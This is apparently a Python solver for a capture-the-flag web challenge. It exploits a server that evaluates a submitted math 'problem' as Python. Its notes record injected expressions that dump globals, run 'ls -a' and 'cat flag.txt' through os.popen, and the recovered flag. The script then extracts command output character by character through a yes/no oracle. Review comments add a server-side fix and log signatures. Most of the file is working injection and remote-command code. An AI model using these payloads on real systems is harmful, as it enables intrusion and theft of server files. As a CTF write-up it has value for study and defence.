import requests
import json
from string import printable
# Endpoint on the mentalmath.tamuctf.com CTF host that e() POSTs each
# problem/answer pair to. The scheme is plain http, so the form fields are
# sent unencrypted.
URL = "http://mentalmath.tamuctf.com/ajax/new_problem"
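def e(payload, ans):
    """Submit one problem/answer pair to URL and return the decoded reply.

    Args:
        payload: Text sent as the ``problem`` form field.
        ans: Value sent, after ``str()``, as the ``answer`` form field.

    Returns:
        The JSON-decoded response body. If the body is not valid JSON, the
        fallback ``{'correct': False, 'bad': True, 'real': <raw body>}`` is
        returned instead, so callers can always index ``['correct']``.

    Raises:
        requests.RequestException: the POST sits outside the ``try`` block,
            so connection-level failures propagate to the caller.
    """
    # The X-Requested-With header marks the request as AJAX; presumably the
    # endpoint only answers such requests (not verifiable from this file).
    data = requests.post(
        URL,
        headers={'X-Requested-With': 'XMLHttpRequest'},
        data={'problem': payload, 'answer': str(ans)},
    ).text
    try:
        return json.loads(data)
    except ValueError:
        # json.JSONDecodeError subclasses ValueError. Catching only that keeps
        # Ctrl-C (KeyboardInterrupt) and SystemExit from being swallowed, which
        # the previous bare ``except:`` did.
        return {'correct': False, 'bad': True, 'real': data}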
# Working notes kept as an unused string literal. It follows code, so it is not
# the module docstring; it is evaluated and discarded at import time.
# The notes record three expressions submitted through the `problem` field and
# what was recovered for each: names from the handler module's globals(), a
# directory listing, and the contents of flag.txt (entries are abbreviated as
# the author typed them).
# NOTE(review): results coming back for these expressions indicate the server
# evaluates the client-supplied problem text as Python, presumably via eval().
# The server code is not shown here. The server-side fix is to generate and
# store the problem on the server (for example in the session), compare only
# the submitted answer, and never evaluate request data.
"""
target = 'list(globals().keys())[1..15]'
globals()
__name__
__doc__
__pac...
__loade,,,
__spec__
__file__
__cache,,,
__builtins..
render
JsonResp
random
index
play
new_pr...
gen_probl...
target = "__import__('os').popen('ls -a').read()"
ls -a
.
..
.dockerignore
db.sqlite3
flag.txt
mana...
__import__('os').popen('cat flag.txt').read()
cat flag.txt
gigem{1_4m_g0od_47_m4tH3m4aatics_n07_s3cUr1ty_h3h3h3he}
"""
# Recover the string produced by `target` one character at a time, using the
# endpoint's 'correct' field as a yes/no oracle: each request asks whether
# ord(<target>[i]) equals the code point of one candidate character.
#
# Defender's view: every recovered character costs up to len(candidates)
# POSTs, and each carries `ord(` and `__import__` in the `problem` field.
# That volume and those substrings are a clear signature in request logs.
target = "__import__('os').popen('cat flag.txt').read()"
# Likely characters go first; the duplicates inside `printable` are harmless.
candidates = '_ .\n' + printable
val = ''
searching = True
while searching:
    for c in candidates:
        payload = f'{target}[{len(val)}]'
        resp = e(f'ord({payload})', ord(c))
        print(f'Trying {c}: {resp}')
        if resp['correct']:
            val += c
            print(f'Process: {val}')
            break
    else:
        # No candidate matched at this index. Presumably the index is past the
        # end of the string, or the character is outside the candidate set.
        print(f'Couldnt next char. Found: {val}.')
        searching = False